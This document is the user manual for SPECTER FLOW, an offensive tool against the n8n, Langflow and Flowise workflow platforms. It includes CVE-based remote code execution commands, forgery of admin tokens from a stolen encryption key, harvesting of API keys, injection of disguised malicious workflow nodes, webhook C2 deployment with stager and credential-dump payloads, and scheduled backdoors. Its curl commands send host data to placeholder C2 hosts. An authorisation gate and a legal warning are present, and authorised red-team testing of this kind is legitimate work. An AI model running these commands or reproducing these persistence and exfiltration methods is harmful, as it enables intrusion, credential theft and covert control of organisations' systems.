SPECTER FLOW

AI Workflow Builder Attack Engine — T109 Documentation

Overview

SPECTER FLOW is the NIGHTFALL framework's AI workflow builder attack engine — the first offensive security tool purpose-built for n8n, Langflow, and Flowise. These visual workflow automation platforms have become the primary enterprise AI agent orchestration backbone, with 100,000+ n8n and 15,000+ Flowise instances exposed on the public internet. Three CISA-flagged CVEs with CVSS 9.3–10.0 are all actively exploited. Zero existing NIGHTFALL tooling covers this attack surface (T72 SPECTER PLATFORM covers chat/RAG platforms — Dify/LibreChat/OpenWebUI, not workflow builders).

Eight subsystems cover passive platform fingerprinting, CVE-anchored RCE chains, admin session forgery from file read primitives, API key extraction, persistent malicious node injection, webhook-based C2 deployment (686% abuse increase per Cisco Talos 2026), and scheduled backdoor workflow installation. 249 tests. Zero failures. OPEN/INJECT/UNLEASHED gate. SFL-{hex12} Ed25519-signed reports.

WARNING: WORKFLOW-POISON, WEAPONIZE, and PERSIST subsystems require UNLEASHED gate. These operations modify live workflow configurations, deploy C2 infrastructure on target systems, and install persistent scheduled backdoors. All UNLEASHED operations require: (1) a signed ROE document containing the phrase "workflow manipulation authorised", (2) the --confirm-workflow-manipulation flag, and (3) the --roe-file path. Execution against systems without written authorisation is illegal under the Computer Misuse Act 1990 and equivalent statutes worldwide.

Installation

# Install from source
pip install -e /path/to/red-specter-specter-flow

# Verify installation
specter-flow --help
specter-flow status

Gate System

Gate	Subsystems	Requirement
OPEN	SURVEY, REPORT	None — passive fingerprinting and reporting only
INJECT	OPEN + WEBHOOK-RCE, SESSION-FORGE, CREDENTIAL-HARVEST	--override INJECT
UNLEASHED	INJECT + WORKFLOW-POISON, WEAPONIZE, PERSIST	--override UNLEASHED --confirm-workflow-manipulation --roe-file <path> (ROE must contain "workflow manipulation authorised")

SURVEY — Platform Fingerprinting

SURVEY fingerprints the target platform before any attack begins. Four probe sets (8 probes each) cover n8n, Langflow, and Flowise. Platform detection uses /healthz banner analysis, /health JSON response, /api/v1/ping, and index page body keyword scanning. Unauthenticated endpoint enumeration identifies which attack surfaces are accessible without credentials. Webhook inventory via /rest/workflows scanning counts exposed webhook nodes. CVE applicability is mapped automatically based on detected platform.

specter-flow survey http://n8n.target.internal:5678

WEBHOOK-RCE — CVE Exploitation

Three independent RCE chains covering all three platforms:

CVE	Platform	CVSS	Technique
CVE-2026-21858	n8n	10.0	Multipart boundary confusion: Content-Type: multipart/form-data with path traversal in filename field. Sends to /webhook/<id>. Server reads file at path and includes content in response.
CVE-2025-34291	Langflow	9.4	/api/v1/validate/code accepts Python code and passes to exec(). Unauthenticated on default Langflow deployments.
CVE-2026-33017	Langflow	9.3	Unauthenticated /api/v1/run with Code component executes arbitrary Python in the Langflow server process.
CVE-2025-59528	Flowise	Max	/api/v1/prediction/<id> accepts unauthenticated requests. question field with JS string termination escapes to require('child_process').execSync().

# n8n Ni8mare file read (INJECT gate)
specter-flow webhook-rce http://n8n.target.internal:5678 \
  --platform n8n \
  --command "id" \
  --override INJECT

# Langflow dual RCE chain
specter-flow webhook-rce http://langflow.target.internal:7860 \
  --platform langflow \
  --command "cat /etc/passwd" \
  --override INJECT

# Flowise prediction endpoint injection
specter-flow webhook-rce http://flowise.target.internal:3000 \
  --platform flowise \
  --command "env" \
  --override INJECT

SESSION-FORGE — Admin Token Acquisition

Stage 2 of the CVE-2026-21858 chain: the file read primitive is used to retrieve ~/.n8n/config, extract the encryptionKey field (HMAC-SHA256 key used to sign admin tokens), and forge a valid authenticated session token. Langflow default superuser credentials (superuser@langflow.org:langflow) are tested. CVE-2025-34291 CORS+CSRF bypass attempts token harvest via unauthenticated /api/v1/users/whoami. Flowise /api/v1/apikey is probed unauthenticated.

# n8n encryption key extraction + token forge
specter-flow session-forge http://n8n.target.internal:5678 \
  --platform n8n \
  --override INJECT

# Langflow default creds + CSRF bypass
specter-flow session-forge http://langflow.target.internal:7860 \
  --platform langflow \
  --override INJECT

CREDENTIAL-HARVEST — API Key Extraction

Systematic extraction of secrets from workflow configurations using 10 compiled regex patterns: OpenAI (sk-), Anthropic (sk-ant-), Google (AIza), Slack (xoxb-), GitHub (ghp_), GitLab (glpat-), AWS (AKIA), generic key=value patterns, Bearer tokens, and Basic auth. Scans /rest/credentials, /rest/workflows, /rest/settings (n8n), /api/v1/flows/, /api/v1/variables, /api/v1/api_key/ (Langflow), /api/v1/credentials, /api/v1/chatflows, /api/v1/variables (Flowise). Individual credential detail endpoints are probed for decrypted values.

# Harvest from n8n with auth token (INJECT gate)
specter-flow credential-harvest http://n8n.target.internal:5678 \
  --platform n8n \
  --token <forged-admin-token> \
  --override INJECT

WORKFLOW-POISON — Persistent Node Injection

UNLEASHED gate required.

Injects malicious execution nodes into existing workflows. n8n: appends Execute Command nodes to the first 3 active workflows, optionally chaining to an HTTP Request exfil node. Langflow: appends a CustomComponent with threading-based subprocess execution. Flowise: injects a customFunction node into chatflow flowData JSON. All nodes use camouflaged names and are appended (not replacing existing nodes) to avoid disrupting business operations.

specter-flow workflow-poison http://n8n.target.internal:5678 \
  --platform n8n \
  --command "curl -sL http://c2.example.com/$(id | base64 -w0)" \
  --token <admin-token> \
  --c2-url https://exfil.example.com/collect \
  --override UNLEASHED \
  --confirm-workflow-manipulation \
  --roe-file /path/to/roe.txt

WEAPONIZE — Webhook C2 Deployment

UNLEASHED gate required.

Converts legitimate workflow platform webhooks into malware delivery / C2 relay channels. Cisco Talos documented 686% increase in n8n webhook abuse for malware delivery between January–March 2026. Requests route through legitimate cloud provider IPs, bypassing URL reputation filters. Two n8n modes: deploy new cron+webhook workflow that serves dynamic payloads based on User-Agent, or hijack an existing webhook-triggered workflow. Five payload types: stager, linux_stager, env_harvest, cred_dump, persist_cron.

specter-flow weaponize http://n8n.target.internal:5678 \
  --platform n8n \
  --payload linux_stager \
  --c2 https://c2.callback.example.com \
  --token <admin-token> \
  --override UNLEASHED \
  --confirm-workflow-manipulation \
  --roe-file /path/to/roe.txt

PERSIST — Scheduled Backdoor Installation

UNLEASHED gate required.

Installs persistent execution mechanisms across all three platforms. n8n: creates new scheduled workflow (disguised as "SystemHealthMonitor-{hex4}") with cron trigger and Execute Command node; also backdoors first active workflow by appending a NightfallPersist node. Langflow: injects a threading.Thread daemon component that re-executes on every flow run. Flowise: injects a setInterval() node into chatflow flowData that calls execSync on a configurable interval (60s–3600s).

specter-flow persist http://n8n.target.internal:5678 \
  --platform n8n \
  --command "curl -sL https://c2.example.com/beacon/$(hostname | base64 -w0)" \
  --interval every_5min \
  --token <admin-token> \
  --override UNLEASHED \
  --confirm-workflow-manipulation \
  --roe-file /path/to/roe.txt

REPORT — Ed25519-Signed Reports

All reports are Ed25519-signed. Keys are auto-generated at ~/.specter_flow/operator.key and operator.pub on first UNLEASHED run. Report IDs follow the format SFL-{12 hex chars}. Reports are generated as both SFL-*.json and SFL-*.html. Findings are automatically generated from subsystem results — RCE success → CRITICAL, admin access → CRITICAL, credential exposure → HIGH, workflow poisoned → CRITICAL, C2 deployed → HIGH, persistence installed → CRITICAL.

specter-flow report http://n8n.target.internal:5678 \
  --platform n8n \
  --output /tmp/specter-flow-reports/

Test Suite

249 tests across 9 test modules. Run with: pytest tests/ -v from the repo root. Coverage: gate enforcement at all three levels (OPEN/INJECT/UNLEASHED), ROE phrase validation, Ed25519 keypair generation and signing, all Pydantic models, platform detection logic, endpoint probe logic, CVE RCE chain mechanics, session forge token extraction, credential regex patterns, workflow node structure, weaponize payload dispatch, persist cron expression correctness, and full report generation including HTML rendering and JSON validity.

Target Platforms

Platform	Instances Exposed	CVEs	Default Ports
n8n	100,000+	CVE-2026-21858 (CVSS 10.0), CVE-2026-21877, CVE-2026-27493	5678
Langflow	Widely deployed	CVE-2026-33017 (CVSS 9.3), CVE-2025-34291 (CVSS 9.4)	7860
Flowise	15,000+	CVE-2025-59528 (Max severity)	3000